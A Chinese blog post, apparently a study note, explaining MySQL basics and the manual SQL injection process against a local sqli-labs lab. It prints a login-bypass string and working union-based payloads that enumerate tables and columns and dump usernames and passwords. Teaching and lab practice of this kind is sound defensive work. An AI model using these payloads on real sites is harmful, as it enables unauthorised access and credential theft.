SQL注入流程

最新推荐文章于 2024-05-13 04:35:06 发布
最新推荐文章于 2024-05-13 04:35:06 发布
阅读量1.9k 收藏 20
点赞数 4
分类专栏: 渗透测试 文章标签: sql 数据库 oracle
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52180702/article/details/125473645
版权

SQL注入流程

SQL

SQL是一门ANSI的标准计算机语言,用来访问和操作数据库

数据库软件主要包括SQL server,MySQL,Oracle等

数据库软件兼容一些主要的SQL关键词操作,SQL语言的私有扩展

在这里插入图片描述

使用phpstudy自带的数据库命令行(软件:MySQL 服务接口: 端口/本地 用户:root等)

phpstudy自带的数据库,账号密码都是root

还可以使用phpMyAdmin,使用该方法操作具有可视化的效果。

在这里插入图片描述

创建数据库:

在这里插入图片描述

查看数据库:

在这里插入图片描述

切换数据库:

在这里插入图片描述

删除数据库:

DROP DATABASE webscurity;

SQL语句对大小写不敏感;分号作为语句的结束,程序中会自动补充。

创建数据表:

在这里插入图片描述

查看数据表:

在这里插入图片描述

插入数据表:

在这里插入图片描述

oreder by 句子:

​ select 你要的信息 from 数据表 oreder by 字段 ASC/DESC

​ 当order by 后的数字大于当前列数(字段数)时会报错。

LIMIT5; 5代表限制条数。

LIMIT0,5; 0代表偏移量,5代表限制条数。

union句子:

​ select 你要的信息 from 数据表1 union select 你要的信息 from 数据表2

常见的内置环境:

​ database():打印当前的数据库名称(select database()😉

​ current_user:打印当前的用户(select current_user;)

​ load_file():返回一个文件内容(select load_file(‘文件路径’)😉

​ version():数据库版本

​ into + outfile:写入文件

连接数据库:mysql -u root -p

注释符:1.# 2.——+ ——空格 3./* */

当前数据库:SELECT database();

把数据库中的某列数据或某几列数据合并:group_concat()

数据库路径:SELECT @@datadir;

information_schema:MYSQL5.0以上的版本自带information_schema这个数据库,5.0以下是没有的。

SQL注入

SQL注入原理

当web应用向后台数据库传递SQL语句进行数据库操作时。如果对用户输入的参数没有经过严格的过滤处理,那么攻击者就可以构造特殊的SQL语句,直接输入数据库引擎执行,获取或修改数据库中的数据。

把用户输入的数据当作代码来执行,违背了“数据与代码分离的原则”。

SQL注入的两个关键点

1.用户能够控制输入的内容

2.web应用把用户输入的内容带入到数据库中执行

SQL注入的危害

  • 盗取网站的敏感信息

  • 绕过网站后台认证

    SELECT * FROM admin WHERE username=‘user’ and password=‘pass’

    SELECT * FROM admin WHERE username=’ ‘or ‘1’ = ‘1’ #’ and password=‘pass’

    'or ‘1’ = ‘1’ #

    and
    1 and 1 1
    1 and 0 0
    0 and 1 0
    0 and 0 0

    or
    1 or 1 1
    1 or 0 1
    0 or 1 1
    0 or 0 0

    !
    !T F

  • 借助SQL注入漏洞提取获取系统权限

  • 读取文件信息

SQL注入的流程

1.寻找注入点

2.判断闭合方式

?id=1asdf

有报错:数字型,无闭合或)闭合

无报错:字符型,再判断闭合方式,‘ “ ’)| ”)

?id=1asdf’

查看报错信息,这里的闭合方式为‘)

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’ LIMIT 0,1’ at line 1

3.验证漏洞

?id=1and 1 --+ 正常显示

?id=1 and 0 --+ 无显示

4.判断列数及回显位

?id=1’) order by 4–+

?id=1’) order by 3–+

说明列数为3列

在这里插入图片描述

在这里插入图片描述

?id= -1’) union select 1,2,3 --+

说明回显位为2,3

在这里插入图片描述

5.取数据

取数据库名:

?id=-1) union select 1,database(),3–+

在这里插入图片描述

取表名:

http://127.0.0.1/sqli-labs/Less-1/?id=-1’ union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),version()–+

在这里插入图片描述

查users

http://127.0.0.1/sqli-labs/Less-1/?id=-1’ union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘users’),version()–+

在这里插入图片描述

查username

http://127.0.0.1/sqli-labs/Less-1/?id=-1’ union select 1,(select group_concat(username) from users),version()–+

在这里插入图片描述

查密码

http://127.0.0.1/sqli-labs/Less-1/?id=-1’ union select 1, group_concat(username),group_concat(password) from users–+

在这里插入图片描述

游子无寒衣
关注
  • 4
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
SQL注入操作流程及实例演示+墨者学院靶场SQL手工注入漏洞测试(MySQL数据库)
ran的博客
01-12 1673
在MYsQL5.0以上版本中,Mysql 有一个系统数据库 information_schema,它是一个存储记录有所有数据库名,表名,列名的数据库,相当于利用该表可以进行一次完整的注入,通过查询它获取指定数据库下面的表名、列名、具体数据信息。当输入了一些乱七八糟的内容之后,网页返回“404错误”或者进行了跳转,则说明本网站对输入的内容可能有检测,则说明这个网站大概率没有注入漏洞。返回的了两个数字,分别是“2”、“3”,因此,修改网址上的“2”、“3”为对应系统函数来进行信息收集。可以在参数值前加“-”;
SQL注入-02-注入步骤
xhxtalent的博客
11-24 1631
SQL注入的攻击步骤: 1、确认注入攻击目标网站 2、目标网站的一般信息的收集、分析与提取 3、网站技术分析:寻找和测试可用注入点,网页输入输出机制分析 4、探子回报:注入SQL确定数据库类型,当前账户权限级别 5、提权分析:根据用户级别确定是否可以与系统层交互提权,是否可以与数据库层交互提权,是否可以获取web后台管理员权限的可能性 6、网站可用SQL注入类型测试,盲注?显注? 7、盲注策略:使用注入分析工具替代人工 ​ 显注策略:第三者上位 攻击的准备–信息收集与分析 1.信念: 没有无用的信息 黑
Web安全——SQL注入漏洞_简述web注入漏洞获取数据库中数据的主要流程
最新发布
2401_84968882的博客
05-13 923
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
SQL注入基础
屿的博客
02-14 4435
各位靓仔们是否经常听到sql注入呢,那么什么是sql注入?引用微软官方的语言来说:SQL 注入是一种攻击方式,在这种攻击方式中,在字符串中插入恶意代码,然后将该字符串传递到 SQL Server 的实例以进行分析和执行。构成 SQL 语句的任何过程都应进行注入漏洞审阅,因为 SQL Server 将执行其接收到的所有语法有效的查询。一个有经验的、坚定的攻击者甚至可以操作参数化数据。那么接下来,让我们来了解一下sql注入是如何产生的。
SQL注入步骤
Qianzshuo的博客
03-20 2008
1、寻找注入点 寻找url中存在?能够传递参数到后端的页面; 例如 news_detail.php?id=2 2、判断是否存在SQL漏洞 判断标准:就是前端输入恶意的SQL内容,能够带到后端数据库执行; 逻辑操作: select * from zeeker where id=2 and 1=1; 结果:可以查出数据 select * from zeeker where id=2 and 1=2; 结果:不可以查出数据 (判断闭合方式忽略) 3、判断当前查询的表有多少列 order by 列数,6报错,5不报
sql注入一般流程(附例题)
热门推荐
Battery的博客
08-03 10万+
在与服务器数据库进行数据交互的地方拼接了恶意的sql代码,达到欺骗服务器执行恶意代码的目的。本质上是程序把用户输入的数据当成了sql语句执行。
SQL注入过程详解
Quest_sec的博客
11-11 873
SQL注入是什么、如何进行SQL注入、一般流程是什么、SQLMAP工具的使用...
SQL注入绕过实战案例
08-31
SQL注入的工作流程包括以下几个步骤: 1. 攻击者识别出可能存在SQL注入的入口点,通常是含有用户输入数据的URL参数、表单提交等。 2. 攻击者尝试向输入字段添加SQL语法,观察应用的响应变化以确定注入是否成功。 3. ...
sql注入知识点总结.pdf
02-11
根据网上视频课程学习总结知识点,文档结构分为SQL注入概述、SQL注入分类、SQL注入流程SQL注入方法、自动化注入做出总结 整理为文档 可以方便查阅
sqlmap sql 注入测试工具
03-06
SQLMap是一款强大的、自动化SQL注入测试工具,专为检测和利用SQL注入漏洞而设计。它可以帮助安全专家或IT从业者在不熟悉目标系统的情况下,轻松发现并利用潜在的SQL注入漏洞,确保系统的安全性。 1. SQL注入简介:...
sqlninja sql注入
01-28
SQL注入是一种常见的网络安全威胁,它利用了不安全的SQL代码设计来访问、修改或破坏数据库。`sqlninja`是一款专为此目的设计的工具,它主要用于检测和利用SQL注入漏洞。这款工具轻量且高效,尤其适用于Linux环境。在...
sql注入工具.rar
08-15
在标题为"sql注入工具.rar"的压缩包中,包含一个名为"sql注入工具.exe"的可执行文件,这是一款专门用于检测和修复SQL注入问题的工具。针对SQL注入,以下是一些重要的知识要点: 1. SQL注入原理:当用户输入的数据...
sql注入详细过程
qq_42890862的博客
06-30 5884
mysql mysql5.0以上版本包含内置的information_schema数据库,它储存着mysql所有的数据库和表结构信息,利用该数据库可以查询到所有的数据库和表的内容 5.0 暴力破解的方式获取数据 1.原理 当我们的Web app在向后台数据库传递SQL语句进行数据库操作时。如果对用户输入的参数没有经过严格的过滤处理,那么攻击者就可以构造特殊的SQL语句,直接输入数据库引擎执行,获取或修改数据库中的数据。 2.sql手工注入的基本思路 (1)找到注入点 在我们可控的输入部分加一些符号,查看页
SQL注入漏洞详解
无言道的博客
03-13 1万+
文章目录SQL注入漏洞原理SQL注入内容注入条件判断注入SQL注释符与注入流程 SQL注入漏洞原理 漏洞原理   web页面源代码对用户提交的参数没有做出任何过滤限制,直接扔到SQL语句中去执行,导致特殊字符改变了SQL语句原来的功能和逻辑。黑客利用此漏洞执行恶意的SQL语句,如查询数据、下载数据,写webshell、执行系统命令以此来绕过登录权限限制等。 检测方法   可以利用sqlmap进行SQL注入的检查或利用,也可以使用其他SQL注入工具。也可以手工测,利用单引号、and 1=1以及字符型
SQLServer/MsSql注入漏洞步骤、使用方法
weixin_46928280的博客
07-20 4457
msSQL/SQLserver数据库的使用方法;渗透SQLserver数据库步骤
[渗透测试笔记] 02.sql注入漏洞基础
H4ppyD0g的博客
08-19 419
select查询 从talbename表中查询所有字段 select * from tablename; 从talbename中查询columnname字段信息 select columnnmae from tablename; union联合查询 要注意union联合查询中的select所查询内容必须与前面的列数相同,并且对应的数据类型要兼容 union默认去重,如果需要查询全部,用uni...
web渗透——SQL注入漏洞攻击步骤
dongxie_tk的博客
10-19 8705
SQL注入是从正常的WWW端口访问,而且表面看起来跟一般的Web页面访问没什么区别,所以市面的防火墙都不会对SQL注入发出警报,如果管理员没查看ⅡS日志的习惯,可能被入侵很长时间都不会发觉。但是,SQL注入的手法相当灵活,在注入的时候会碰到很多意外的情况,需要构造巧妙的SQL语句,从而成功获取想要的数据。
PentesterLab靶场sql注入流程
07-27
PentesterLab靶场的SQL注入流程可以按照以下步骤进行: 1. 首先,我们需要找到一个存在SQL注入漏洞的目标网站。可以使用工具或手动查找目标网站。 2. 一旦找到目标网站,我们可以使用不同的注入技术进行测试。在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

游子无寒衣

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值